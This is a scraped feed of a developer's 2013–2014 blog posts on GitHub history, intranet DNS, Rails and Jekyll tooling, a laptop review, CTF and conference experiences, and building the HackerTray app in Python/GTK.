example, my sister was recently engaged and I didn’t go on a social update spree telling the whole world about it, because I value her privacy.\nMy simple rule of thumb is to ask for permission, rather than beg for forgiveness as a person’s privacy is far more important.",[],{"slug":2871,"title":2872,"link":2873,"pubDate":2874,"contentSnippet":2875,"tags":2876,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"first-project-on-github","What was the first project on GitHub?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F08\u002F02\u002Ffirst-project-on-github\u002F","2014-08-02T00:00:00.000Z","Note: This is cross-posted from Quora where I wrote this answer initially.\nThe first project on GitHub was grit. How do I know this? Just some clever use of the search and API.\nHere’s a GitHub search to see the first 10 projects that were created on GitHub. The search uses the created keyword, and searches for projects created before 15 Jan 2008.\nThey are (in order of creation) (numeric id of repo in brackets):\nmojombo\u002Fgrit (1)\n    \nGrit gives you object oriented read\u002Fwrite access to Git repositories via Ruby.\nDeprecated in favor of libgit2\u002Frugged\nwycats\u002Fmerb-core (26)\n    \nMerb Core: All you need. 
None you don’t.\nMerb was an early Ruby framework that was merged into Rails.\nNo longer maintained.\nrubinius\u002Frubinius (27)\n    \nRubinius, the Ruby Environment\nStill under active development\nmojombo\u002Fgod (28)\n    \nGod is an easy to configure, easy to extend monitoring framework written in Ruby.\nStill actively maintained, and used by GitHub internally as well, I think\nvanpelt\u002Fjsawesome (29)\n    \nJSAwesome provides a powerful JSON based DSL for creating interactive forms.\nIts last update was in 2008\nwycats\u002Fjspec (31)\n    \nA JavaScript BDD Testing Library\nNo longer maintained\ndefunkt\u002Fexception_logger (35)\n    \nThe Exception Logger logs your Rails exceptions in the database and provides a funky web interface to manage them.\nNo longer maintained\ndefunkt\u002Fambition (36)\ntechnoweenie\u002Frestful-authentication (42)\n    \nGenerates common user authentication code for Rails\u002FMerb, with a full test\u002Funit and rspec suite and optional Acts as State Machine support built-in.\nMaintained till Aug 2011\ntechnoweenie\u002Fattachment_fu (43)\n    \nTreat an ActiveRecord model as a file attachment, storing its path, size, content type, etc.\nI’m sure the ids from 2-25 would be taken up by many of the internal GitHub projects, such as github\u002Fgithub. To get the numeric id of a repo, visit https:\u002F\u002Fapi.github.com\u002Frepos\u002Fmojombo\u002Fgrit and change the URL accordingly.",[],{"slug":2878,"title":2879,"link":2880,"pubDate":2881,"contentSnippet":2882,"tags":2883,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"how-does-sdslabs-co-in-work","How does the sdslabs.co.in domain name work?","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F07\u002F27\u002Fhow-does-sdslabs-co-in-work\u002F","2014-07-27T00:00:00.000Z","A very commonly asked question is about our domain name and how it works locally. When we launched filepanda, and our preliminary homepage a long time ago, we had been using the easy to remember IP address http:\u002F\u002F192.168.208.208.\nNow, however, we are using the domain name sdslabs.co.in for all our services, including DC. To understand how this works, you will have to understand how the name resolution of a domain name takes place.\nThe Domain Name System (DNS) is a hierarchical distributed naming system for computers, services, or any resource connected to the Internet or a private network. It associates various information with domain names assigned to each of the participating entities.\n- Wikipedia\nDNS is basically a service which resolves domain names to IP addresses. If you own a domain name, you can point it to wherever you want. This is usually done in the administration panel of your hosting services. We have set up multiple domains on our nameserver (mitsu.in as of the moment) to point to the IP address 192.168.208.x.\nFor instance, sdslabs.co.in points to 192.168.208.208, echo.sdslabs.co.in points to 192.168.208.204 and so on. This is done by updating something called A records (this is the part of resolution which translates to IPv4 addresses).\nThe benefits of having such a system in place are enormous:\nUsers don’t have to remember IP addresses, and can easily remember the site address.\nWe can move services and applications around over different machines, and it will only take a single update to change the name resolution.\nWe could add alternative fallback servers easily (by having multiple A record entries) for a domain. 
We could even use this to point the sdslabs.co.in domain to something that is hosted online, for instance.\nWe can have catchy and simple to remember URLs, e.g. https:\u002F\u002Fsdslabs.co.in\u002Flogin and https:\u002F\u002Fsdslabs.co.in\u002Flogout\nAlso, we are running all our services on https, which is not dependent upon the visibility of the website. Even though the site is hosted locally, the process of certificate signing remains exactly the same as any other site. Once we acquire an SSL certificate and attach it to our web-server, the visibility of the domain does not matter to the browser at all.\nNote: For the benefit of those not in IIT Roorkee, we are running multiple web services on the domain sdslabs.co.in, which is only served locally, as it resolves to a local IP address (192.168.208.208)\nCaveat: Several DNS servers will block RFC 1918 responses by default (basically any DNS response in the private IP ranges). This is usually disabled in intranet scenarios, but something to keep in mind if you’re looking to use this solution.",[],{"slug":2892,"title":2893,"link":2894,"pubDate":2895,"contentSnippet":2896,"tags":2897,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"back-to-rails","Coming back to rails","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F07\u002F11\u002Fback-to-rails\u002F","2014-07-11T00:00:00.000Z","I’ve worked with rails previously, but that was a long time back\nand even though I’ve continued to dabble with it,\nI’d never built anything complete or large enough with it. This time,\nhowever, I’m working on an actual large-scale application with all the\nnuts-and-bolts that make rails such a pleasure to work with. Since\nI’m coming back to rails after such a long time, I thought I’d document\nsome of the cool new features that I’ve found in rails this time around.\nSpring\nOne of the major discomforts of working with rails on the\ncommand line was that it is heavy and slow. Spring works behind\nthe scenes on the second issue, namely speed. Here’s how the\nproject’s README describes it:\nSpring is a Rails application preloader. It speeds up development\nby keeping your application running in the background so you don’t\nneed to boot it every time you run a test, rake task or migration.\nYou can update all the binaries in your PROJECT_ROOT\u002Fbin\u002F directory\n(which include rails, bundle and rake) to make use of spring\nby executing the following command:\n\nbundle exec spring binstub --all\n\n\nAny further execs (such as .\u002Fbin\u002Frake -T) will make use of\nthe spring pre-loader, leading to much faster startup times. You can even\nuse spring against the default system binaries by prefixing the commands\nwith spring, such as spring rake -T.\nResque-Scheduler\nI needed a job queue for background tasks and polling API\nservices, and what better tool to use than resque. I’m using it in combination\nwith resque-scheduler for\nrunning tasks on cron. How it works is that in addition to your main rails\nserver and a long running resque job process, a separate resque-scheduler\nrake task is kept running, which loads up the schedule and inserts\ntasks accordingly into the resque queue as per the schedule.\nFor those new to resque in general, you can start the two processes by:\nQUEUE=* rake environment resque:work # To start resque\nrake resque:scheduler\n\n\nNote that we are pre-loading the rails environment in the resque:work task as\nit will load rails for you across all of your tasks. 
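As an aside, a convenient way to keep the worker and the scheduler running side by side in development is a process manager such as foreman (a separate gem; the Procfile below is a hypothetical sketch, not part of this setup):\n\ngem install foreman\ncat > Procfile \u003C\u003C'EOF'\nworker: QUEUE=* rake environment resque:work\nscheduler: rake resque:scheduler\nEOF\nforeman start   # runs both processes and interleaves their logs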
Also note that you\nwill need the following two lines in your Rakefile to get these tasks to run:\nrequire 'resque\u002Ftasks'\nrequire 'resque\u002Fscheduler\u002Ftasks'\n\n\nAlso remember to define the resque:setup task according to the \nresque-scheduler README, which would load the schedule and config as needed.\nThis blog post is a work-in-progress and I will continue to update it with\nbits of rails-foo as I learn more.\nRake-notes\nI’d never tried using notes before, and as it turns out, using rake:notes\nis easy and super-awesome. Its allows you to spread your notes about TODOs, FIXMEs and such throughout your codebase and take a bird-eye’s look at them with just a single command.\nRead more about it at http:\u002F\u002Fsiong1987.com\u002Fposts\u002Fpowerful-and-hidden-rake-notes-in-rails\u002F",[],{"slug":2892,"title":2893,"link":2894,"pubDate":2895,"contentSnippet":2896,"tags":2897,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"galago-ultra-pro-review","A month with the System76 Galago Ultra Pro","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F07\u002F04\u002Fgalago-ultra-pro-review\u002F","2014-07-04T00:00:00.000Z","With my recent CCTC Winnings, I decided to purchase a new laptop as my old Dell Inspiron was not performing up to the mark. Being of a time before the Intel i-series launch, it was also severely lacking in several features, most notably virtualization support, which is badly needed these days.\nAfter taking a thorough look at the various offerings in the market (and being disappointed by most of them), I decided to go with the [System Galago Ultra Pro][galago] for the following reasons:\nLinux Support (Just Ubuntu actually, but its nice to have a laptop that supports and comes with Linux pre-installed).\nIntel HD 5200 Graphic Card. Even though the nVidia\u002FATI support has been getting better in Linux these days, I wanted a graphic card that I could use without worry, for both playing games, using webGL without having to worry about things like overheating and switching card modes (optimus\u002Fbumblebee and whatnot).\nHaswell. Not many manufacturers are currently offering Haswell lineups, and System76 is one of the few with them in the market.\nThe other few machines I did consider included the Apple MBP, Lenovo Ideapad, Dell Sputnik 13. The MBP was rejected because I wanted a Linux machine, and it was overly costly; the Ideapad had a touch screen, which I abhor; and finally the Sputnik is too expensive as well.\nA few other machines were rejected because I was exclusively looking for a 14-inch screen, due in part to my experience with my previous bulky machine.\nHardware Review\nThe build quality of the Galago is above average, but its still a flimsy offering, when compared to the MBP or other business class offerings such as the Vostro. A lot of the Galago reviews on the internet talk about the defective keyboards, but I faced no such issues. It seems to have been fixed, and the keyboard has been iterated several times since, I think.\nThe IPS screen (1920x1080) is a real gem, and I’ve gotten used to watching everything in full HD these days. The laptop has 2 small fans on the lower side, and they hardly ever kick in, making it a quiet laptop. The only times it heats up much is when I’m playing demanding games or doing something GPU intensive. A few issues that I’ve actually faced with it include:\nThe Esc key not responding to all presses. I have to hit it with a slightly extra pressure for each keypress to register. 
However, this is just a quirk I’ve come to accept, and work around. My muscle memory soon overtook and I’m now used to pressing it hard.\nMissing Media keys. It does have the usual Mute, Volume, and the Play\u002FPause keys, but the next\u002Fprevious media keys are missing on the keyboard.\nThe charger getting heated up (a lot). It even heats up when the charger is not connected to the laptop.\nThe inbuilt speaker quality is definitely not above average. I usually use my earphones with it, so its not much trouble to me anyway.\nThe “clickpad” becomes a “touchpad” in Windows, which means drag-drop becomes extremely uncomfortable if you’re not used to it. I’ve installed the official touchpad drivers in Windows from knowledge76, but I could not find a setting to use “clicks” instead of “touch”.\nAs an aside, I really like the keyboard layout (I don’t like numeric keypads much) and the placement of Del-End keys, which is incidentally same as my previous laptop. I really dislike those layouts where you have to press a combination of Fn+Some key just to trigger Page Up\u002FDown. A note to laptop manufacturers : Please stop messing with the keyboards.\nHaving a branded Ubuntu key is also a good show-off at some places :) I also have to mention that the laptop is very silent. The fans rarely kick in, and I have faced no heating issues so far.\nSoftware Side\nDespite being built for Linux, I’ve still faced a few software issues on Linux. None of these are a deal-breaker though for me. The first time I realized that it wasn’t really built for Linux was when I booted using my external to Ubuntu 12.04 and the WiFi didn’t work. Apparently you need a combination of System 76 custom (though open-source) drivers and 14.04 on this machine to get the drivers to work. This is one of the reasons I haven’t downgraded to Elementary Luna (which is based on Ubuntu 12.04). The issues I’ve faced (along with my workarounds) include:\nFlash not working on Google Chrome Stable. I talked to System76 support over this, and I’m yet to get it working. As a workaround, I’ve been using Google Chrome Unstable (which I usually use anyway), and it detects flash fine.\nWebGL support in Chrome is a bit sketchy. Chrome stable doesn’t detect the graphic card as supported, while the Chrome Unstable version did detect it as working for a while, but the graphic card was either removed from the whitelist, or added to the blacklist in a future update, making it non-working again. Currently, I’m using the “Disable WebGL Blacklist” flag from chrome:\u002F\u002Fflags to get it working.\nWebcam not being detected. This has gotten me a bit puzzled. It was working fine on the fresh Ubuntu 14.04 setup, but some driver issue is preventing it from working now. I think a dist-upgrade should fix it, but I’m not sure. I might try to re-install the system76-driver package if that doesn’t work. Update: It started working again after just a restart.\nAnother minor issue I face is that the brightness key on the keyboard (Fn+F8\u002FF9) allows you to take the brightness level all the way down to zero. So you could make your screen pitch-black, with absolutely no idea how to get it back to normal. This happens only on ubuntu, though.\nOverall\nDespite its few quirks, I’m liking my new laptop. I’m enjoying gaming on it (on both Linux and Windows), and it has more than enough power to run whatever combination of VMs I want to.\nGaming\nAll the Linux games from my various Humble Bundle purchases are finally being put to good use. 
The only game that I haven’t been able to run is Oilrush, which doesn’t support Intel Graphic cards on Linux for some reason. Some of the games that I’ve tried and enjoy on Linux include:\nMark of the ninja\nThe Swapper\nDon’t Starve\nFez\nBit Trip Runner 2\nCounter Strike: Source\nPortal\nHalf-Life 2\nCivilization 5\nTrine 2\nMinecraft\nTrine 2 does show some noticable lag on full settings, but its not supported on Intel drivers anyway. Rest of the games run wonderfully on full settings.\nI haven’t tried gaming much on Windows, but I do play Blur (admittedly a 3 year old game) sometimes on it at the highest settings.\nSpecs\nThe only thing I upgraded in my laptop was an increase in RAM from the default of 4GB to 8GB, primarily because I intend to run lots of VMs on this machine. The rest is same as the specs on the official site (scroll to bottom):\n\nProcessor: Intel(R) Core(TM) i7-4750HQ CPU @ 2.00GHz\nRAM: Samsung, SODIMM DDR3 Synchronous 1600 MHz (0.6 ns), M471B5173QH0-YK0 (4GiB) x2\nGraphic Card: Intel Iris Pro Graphics 5200 with 128 MB eDRAM, Crystal Well Integrated Graphics Controller\nHard Disk:  Western Digital, WDC WD5000LPVX-2, 500GB (465GiB)\nMemory: 8GB 204 pin Dual Channel DDR3 @ 1600 MHz (2x4GB)\nIntel ME Version: 9.0.20.1447\n\n\nIf you’re interested in getting any further details about the laptop, feel free to contact me.",[],{"slug":2899,"title":2900,"link":2901,"pubDate":2902,"contentSnippet":2903,"tags":2904,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"cctc-wave-3","Deloitte CCTC Wave III","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F06\u002F03\u002Fcctc-wave-3\u002F","2014-06-03T00:00:00.000Z","I was winner of the Deloitte CCTC Wave I, and a finalist for the Wave II.\nIt was natural I was participating this year as well. While the first year\ninvolved a simple penetration test as the first round, and it was an abstract\nsubmission in Wave II; this time it was a closed jeopardy-style CTF contest\nbetween different teams from various colleges.\nThere were altogether more than 30 teams participating in the CTF. I was lucky\nto have teammates like Abhishek Das(CCTC Wave II Winner) and Ravi Kishore\nwho endured through several challenges when I gave up.\nWe’ve published all challenges over on GitHub along with writeups and problems\nbeing made available wherever we can.\nThe challenges ranged from very easy to difficult to absurd trivia. We topped\nthe round with the most number of points across the board, making sure we got\nthe +30 bonus for solving first on all but 2 challenges out of 13.\nWe’ll be leaving for Hyderabad for the finals in the first week of April. Wish us\nluck, will you.\nUpdate: We won the final event at Hyderabad as well. More details (and a pic) on our blog post on SDSLabs here.",[],{"slug":2906,"title":2907,"link":2908,"pubDate":2909,"contentSnippet":2910,"tags":2911,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"backdoor-and-quizzes","BackdoorCTF and Quizzes","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F03\u002F25\u002Fbackdoor-and-quizzes\u002F","2014-03-25T00:00:00.000Z","I recently hosted a Geek Quiz at my college along with Giri. The quiz\nwas mostly geek with some sports and pop-cult trivia. 
Here are the slides for\nthe quiz (both prelims and finals):\nGeek Quiz Prelims\n\n\nGeek Quiz Finals\n\n\nSome audio\u002Fvideo files for the finals are up here.\nBackdoorCTF 2014\nLast year, I was the coordinator for Backdoor CTF 2013, a jeopardy-style CTF\ncontest hosted by SDSLabs under the aegis of Cognizance. This year,\nI contributed 3 problems to the CTF. The problems were as follows:\nweb200 - Timing Attack (Source)\nweb250 - YAML Code Execution (Source)\nweb100 - _ Template Code Execution (Source)\nYou can find writeups\u002Fsolutions to the problems all over the internet and on ctftime.\nHosting a CTF is always a humbling experience and it was great to see teams from\nall over the world participating in backdoor. We hope to return next year with\neven better challenges.\nCogni Geek Quiz\nAfter that I teamed up with Giri again (along with Sukun) for the Cogni Geek Quiz,\nhosted by the winner of my quiz, Vikram Rathore. While we won the quiz\nby a large margin (30 points), I managed to get my own tribute question wrong unfortunately.\nHowever, it was a great experience involving some really nice questions. Update: The slides\nare up at mega.\nColors & Typefaces\n#cbe86b\n#1c140d\nTypefaceOswald\nTypefaceLato\n\n\n\n\n    \n#2e2633\n#99173c\nTypefaceOswald\nTypefaceLato",[],{"slug":2913,"title":2914,"link":2915,"pubDate":2916,"contentSnippet":2917,"tags":2918,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"nullcon-experience","My experience at nullcon 2014","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F03\u002F13\u002Fnullcon-experience\u002F","2014-03-13T00:00:00.000Z","I was recently a speaker at nullcon 2014, a premier infosec conference\nin India. My talk was a re-hash of my earlier talk at Deloitte CCTC-2\nand was titled “Browser Extension Security”.\nI applied for the CFP sometime in November with a copy of my talk, paper and\ncode I’d used. My application was reviewed and I was told, accepted under the\nnight-track on 13th February.\nThe talk itself covered browser security mechanisms, and where the\ncurrent state of art lies (Chrome) with respect to Browser Extensions. The talk\nwas pretty well received (even though I sweated a lot onstage), and a lot\nof attendees came up to me to discuss it further after the talk.\nThe paper behind the talk, and the related source code can be found on GitHub.\nCreate a new issue or send me an email in case you have any queries. ~The tool demo\nI gave during the talk can be found at http:\u002F\u002Fnullcon.captnemo.in~ (Not available anymore). Note, however\nthat it currently uses cached data to check for permissions, and is not a LIVE tool.\nnullcon was my first conference, and I’m glad to say I enjoyed it very much. From\nthe great hosts to the amazing parties, and all the free booze, I loved it all.\nI made a lot of friends, and I plan on keeping in touch. The networking level\nwas amazing at the conference, and I was happy to get in touch with so many guys\nin the industry, so to speak.\nA lot of people queried me about future research on the topic, and while I currently\ndo not have enough time to pursue it, its on my radar of things to do. I’m also\nthinking of getting in touch with the Chrome Security Team with my research.\nAs an aside, a big thanks to Rushil for helping me in the first version\nof the paper for CCTC. It won’t have been possible without him.\n##Some Clicks\n\n\nI’m still waiting on receiving official clicks from nullcon. 
Will update this\npost when I get my hands on them.",[],{"slug":2920,"title":2921,"link":2922,"pubDate":2923,"contentSnippet":2924,"tags":2925,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"pluginless-jekyll","Using Jekyll optimally without plugins","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2014\u002F01\u002F20\u002Fpluginless-jekyll\u002F","2014-01-20T00:00:00.000Z","If you’re a programmer, by now you’ve surely heard of the various static-site\ncompilers that are taking over the world. My pick of choice is Jekyll, (about\nwhich I’ve blogged earlier as well) mostly because\nit is the default supported tool for the GitHub Pages service. Read my earlier\nblog post if you don’t know about Static Site Generators.\nUsing Jekyll means that it is far more easier for me to host my blog on GitHub\nPages by just writing down posts in plain markdown. Markdown, for those of you\ndon’t know is a simple markup language that uses an email-like syntax that is\nthen compiled to HTML.\nA lot of power in Jekyll comes from its various plugins, but I’ve always been\nvary of using them as the default host for Jekyll (GitHub Pages) disables\nall plugins and runs in safe mode. Plugins are an awesome tool to have, but they\nare only good if you are hosting the site on your own machines. I’m not shying\naway from using them but want to point out that plain-Jekyll itself is powerful\nenough to do most of the tasks. What follows are some examples of how to use\nJekyll optimally.\nData Files\nThis is a recent addition in Jekyll that allows you to use\ndata noted down in YAML format inside the _data directory that is accessible\nto you anywhere using the site.data prefix. For instance, I recently shifted\nthe SDSLabs Team Page from plain HTML to Jekyll, and I used a data file\nto define all the required elements that are shown for every user. The data file\nlooks something like this (_data\u002Fmembers.yml):\n- name: \"Abhay Rana\"\n  pic: \"abhay.jpg\"\n  links:\n    Facebook: \"https:\u002F\u002Ffacebook.com\u002Fcapt.n3m0\"\n    Twitter: \"https:\u002F\u002Ftwitter.com\u002Fcaptn3m0\"\n- name: \"Team SDSLabs\"\n  pic: \"sdslabs.jpg\"\n  links:\n    Facebook: \"https:\u002F\u002Ffacebook.com\u002FSDSLabs\"\n    Twitter: \"https:\u002F\u002Ftwitter.com\u002Fsdslabs\"\n\n\nThen, I iterate over this data using the following syntax:\n{% for member in site.data.members %}\n\u003Cimg src=\"pics\u002F{{member.pic}}\" alt=\"{{member.name}}\">\n\u003Cdiv class=\"img-bar\">\n  \u003Cspan class=\"img-title\">{{member.name}}\u003C\u002Fspan>\n  \u003Cspan class=\"img-icons\">\n    {% for link in member.links %}\n    \u003C!-- link[0] holds the hash key = facebook\u002Ftwitter -->\n    \u003Ca href=\"{{link[1]}}\">\u003Cimg src=\"assets\u002F{{link[0]|downcase}}.png\">\u003C\u002Fa>\n    \u003C!-- link[1] holds the hash value-->\n    {% endfor %}\n  \u003C\u002Fspan>\n\u003C\u002Fdiv>\n{% endfor %}\n\n\nEarlier, you could have achieved the same thing by adding this data to your\n_config.yml file, but the _data folder allows you to store data properly\nin various files, if needed.\nLiquid Filters\nSince Jekyll relies on Shopify’s Liquid language for templating\npurposes, it has a very large list of supported functions, filters and markup\ntools ready for you to use. 
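A quick way to poke at these filters before the real example below is a scratch page with empty front matter, built in the same plugin-free --safe mode that GitHub Pages uses. A minimal sketch (the file name is hypothetical, and jekyll must be installed):\n\ncat > filter-test.html \u003C\u003C'EOF'\n---\n---\n{{ \"Web Development\" | split: \" \" | first | downcase }}\nEOF\njekyll build --safe\ncat _site\u002Ffilter-test.html   # prints: web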
For instance, while working on the\nSDSLabs Portfolio, I used the split and downcase filters to convert\na known list of categories to single-word strings that could be used as file\nnames.\n{% for category in site.data.category %}\n  \u003C!-- category is something like \"Web Development\"-->\n  {% assign category_name = category|split: ' '|first|downcase %}\n  \u003Ca href=\"\u002Fcategory\u002F{{category_name}}.html\">{{ category }}\u003C\u002Fa>\n{% endfor %}\n\n\nThe above snippet converts a string like “Web Development” to a smaller string\n“web” that can be used by us for filenames much more easily.\nYou can check out more liquid filters over here. These include\nthings like plus, times, reverse, and even md5 (helpful for gravatars).\nCode Highlighting\nMarkdown is really awesome, but it lacks syntax highlighting for code. Jekyll\nuses pygments to support syntax highlighting for various languages.\nTo highlight a piece of code, you just use the following syntax:\n{% highlight ruby %}\ndef show\n  @widget = Widget(params[:id])\n  respond_to do |format|\n    format.html # show.html.erb\n    format.json { render json: @widget }\n  end\nend\n{% endhighlight %}\n\n\nAnd the output will look like this:\ndef show\n  @widget = Widget(params[:id])\n  respond_to do |format|\n    format.html # show.html.erb\n    format.json { render json: @widget }\n  end\nend\n\n\nCustom Permalinks\nEveryone knows about handling blog post permalinks using the permalinks\nsetting in _config.yml. But did you know that you can provide a custom\npermalink to any page in your site? For instance, the Jekyll documentation site\nuses the following:\n\npermalink: \u002Fdocs\u002Fconfig\u002F\n\n\nin the frontmatter for the file docs\u002Fconfiguration.md. The file would have\nbeen published to docs\u002Fconfiguration.html by default, but the permalink in the\nfile forces it to be published to \u002Fdocs\u002Fconfig\u002Findex.html. It’s a really nice\nsetting that allows you to customize the URL for any particular post.\nRaw Liquid Tag\nIn the rare case that you want to use liquid-like syntax somewhere, say you are\nusing Handlebars (which uses {{{variable}}} to echo variables).\nYou can use the following syntax:\n\n{% raw %}\nHere is some {{mustache}}\n{% endraw %}\n\n\nIn fact, I’ve used the raw tags a lot in this blog post to escape all the liquid\nportions. You can see the liquid documentation for more help.\nSide Note: Writing the endraw tag in liquid is really, really hard.\nEmbedding HTML\u002FCSS inside markdown\nSometimes, there are some things that just can’t be done with markdown. For\ninstance, if you need to use a custom tag, or need to write some css within the\nmarkdown document for some reason, there is always a way: just embed content\ninside \u003Cdiv> tags. This is not a Jekyll feature but an implementation detail\nof Markdown itself; I think it’s hacky enough to get a mention here.\n\nWriting **markdown** here\n\u003Cdiv>\n  \u003Cstyle>\n    body {\n      margin-top: 10px;\n    }\n  \u003C\u002Fstyle>\n\u003C\u002Fdiv>\nBack to _Markdown_.\n\n\nAnything inside a \u003Cdiv> tag is untouched by Markdown, and is rendered as it is.",[],{"slug":2927,"title":2928,"link":2929,"pubDate":2930,"contentSnippet":2931,"tags":2932,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"on-github","On GitHub","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2013\u002F12\u002F25\u002Fon-github\u002F","2013-12-25T00:00:00.000Z","I am an Internet addict. 
And the website I’m most addicted to is called GitHub. GitHub is a social code hosting website that is totally awesome. Not your general run-of-the-mill awesome, but rather ass-kicking best-thing-in-the-world awesome. If GitHub was a ninja, it would be Po, defeating the evil clutches of SourceForge.\nWhen Linux was released a couple of decades ago, it was hosted on a university FTP server. Today, the days of FTP are way past, and unless your code is hosted on a code-sharing website like GitHub, it is as good as dead. The last decade has seen an explosive growth in software and the open source movement. Things like GitHub, Linux, Android, Facebook have been made possible due to the combined efforts of millions across the globe following the Unix philosophy of doing one thing well.\nAhh, I digress. The point I’m trying to make is that it is very hard to explain to a layman how important GitHub has been to the software community. It has been used as a collaboration platform for writers, lawmakers, governments, programmers, and even musicians. People have used its issue tracking feature to even plan weddings. And above all, people adore GitHub. It is one of the few startups that have been accorded God status in the community.\nThe question here is: what makes GitHub tick? As the largest hosting site for code, it obviously makes a huge impact just by virtue of being there. But its tide of features and innovative progression has made it a darling of all. For instance, its one-click fork feature has made contributing to any project so much easier.\nGitHub has an amazing User Experience, making sure it works perfectly on all devices large or small. Their amazing support makes sure all of its users are as happy as possible. Their regular meetups make sure that GitHub is invested in the software community itself. And their GitHub Store lets people invest back in GitHub by promoting it via tees, stickers and even laptop sleeves.\nMy personal experience with GitHub has been overwhelmingly positive. People have stood beside GitHub even as they faced major issues, and for me that is indicative of a trust in GitHub that no money can buy. The GitHub API (which I’ve used more than once) lets developers create their own apps on top of GitHub which others can use to create even more awesome things.\nFor me GitHub is more than just a coding website. It is a testament to creativity and the Hacker Way, reminding me every day that anything is possible.",[],{"slug":2934,"title":2935,"link":2936,"pubDate":2937,"contentSnippet":2938,"tags":2939,"maintainerName":213,"maintainerUsername":214,"maintainerPhoto":215,"feedUrl":216},"making-hackertray","Making HackerTray","https:\u002F\u002Fcaptnemo.in\u002Fblog\u002F2013\u002F11\u002F28\u002Fmaking-hackertray\u002F","2013-11-28T00:00:00.000Z","A few days back, I found the excellent HackerBarApp via Hacker News. Hacker News,\nfor those of you who don’t know, is a tech news website run by Y Combinator.\nHacker Bar was the simplest way of accessing HN stories that I’d ever seen. Unfortunately,\nit was only for Mac (made using rubymotion) and even though the source was available,\nit was of no use to me as a Linux user.\nI decided to make a clone of Hacker Bar that would work on Linux. My first choice of the\nstack was node-webkit, an application framework that allows you to build cross-platform\napplications using HTML, CSS, JS, and modules from the node.js ecosystem. 
After reading a lot\nabout node-webkit, I figured out that building this application in node-webkit (as it stands)\nwould not be possible. Or rather, it would not work under Ubuntu and its derivatives because\nof lacking appindicator support in node-webkit. More details here.\nThe next obvious language and stack of choice was Python + Gtk. I’d already played a little bit\nwith Gtk and Python some time back, so I knew the basics. But I’d never built a real application\nwith PyGtk, just toys and small scripts. I found a basic skeleton app\nthat was written for AppIndicator and modified it somewhat to form the base of HackerTray.\nThe next challenge I faced was keeping the check boxes always checked despite any number\nof clicks after the first. That is, we don’t want any menu item to be “un-checked” at\nany moment. A basic idea is to do this (partial code):\ndef open(self, widget):\n\tif(widget.get_active() == False):\n\t\twidget.set_active(True)\n\twebbrowser.open(widget.url)\n\ndef addItem(self, item):\n\t#create a new CheckMenuItem (i)\n\ti.connect('activate', self.open)\n\n\nHowever, this does not work as expected, because the widget.set_active() call also results\nin the activate event being fired, which ultimately calls open. This means on a click to\nan unchecked menuItem, the open function is called twice. This results in the browser opening\nthe link twice.\nAs a workaround, I disabled the event handler in case it is a checked menuItem:\ndef open(self, widget):\n\tif(widget.get_active() == False):\n\t\t# temporarily disconnect, so that set_active() doesn't re-fire 'activate'\n\t\twidget.disconnect(widget.signal_id)\n\t\twidget.set_active(True)\n\t\twidget.signal_id = widget.connect('activate', self.open)\n\twebbrowser.open(widget.url)\n\ndef addItem(self, item):\n\t#create a new CheckMenuItem (i)\n\ti.signal_id = i.connect('activate', self.open)\n\n\nThe next thing I worked on was a persistent memory for the app. In a nutshell, I needed to\nmake sure that the tick on an item remained there, even if the app was restarted. This meant\nwriting a list of all the “viewed” items into a file. After looking at shelve for a\nbit, I just rolled my own implementation,\nbased on storing the data in a ~\u002F.hackertray.json file.\nAfter that I worked on packaging the app into a python package, so that it could be easily installed.\nThe python packaging tutorial was an easy-to-use guide\nthat let me create the package\neasily and push it to the Python Package Index. A few issues in the package\nwere found, and were fixed quickly thanks to the pull request by @brunal.\nAfter improving the README a bit, I posted about it on Hacker News, where it failed to get any traction. I re-tried with a link\nto the HackerTray website, and that fell flat as well. It was on the next day, when I posted it to HN\nfor the third time, that it took off. After 50 or so upvotes, I found that my instance refused to run because it had\nhit the API Rate Limit on the excellent node-hnapi. I quickly pushed a fix\nthat used a list of servers to hit as a fallback in case it crossed the Rate Limits.
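For what it's worth, GTK also has a built-in alternative to the disconnect/reconnect dance shown above: a signal handler can be temporarily blocked by its ID. A minimal sketch, assuming the modern PyGObject/GTK 3 bindings (the post used the older PyGtk API, so names differ slightly):

import webbrowser

import gi
gi.require_version("Gtk", "3.0")
from gi.repository import Gtk

def add_item(menu, title, url):
    # Hypothetical item setup, mirroring the post's addItem().
    item = Gtk.CheckMenuItem(label=title)
    item.url = url
    item.signal_id = item.connect("activate", on_activate)
    menu.append(item)

def on_activate(item):
    if not item.get_active():
        # Block our handler so set_active(True) doesn't re-enter
        # on_activate and open the link twice.
        item.handler_block(item.signal_id)
        item.set_active(True)
        item.handler_unblock(item.signal_id)
    webbrowser.open(item.url)

handler_block()/handler_unblock() avoid tearing down and re-creating the connection on every click, which is both cheaper and less error-prone than re-connecting.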
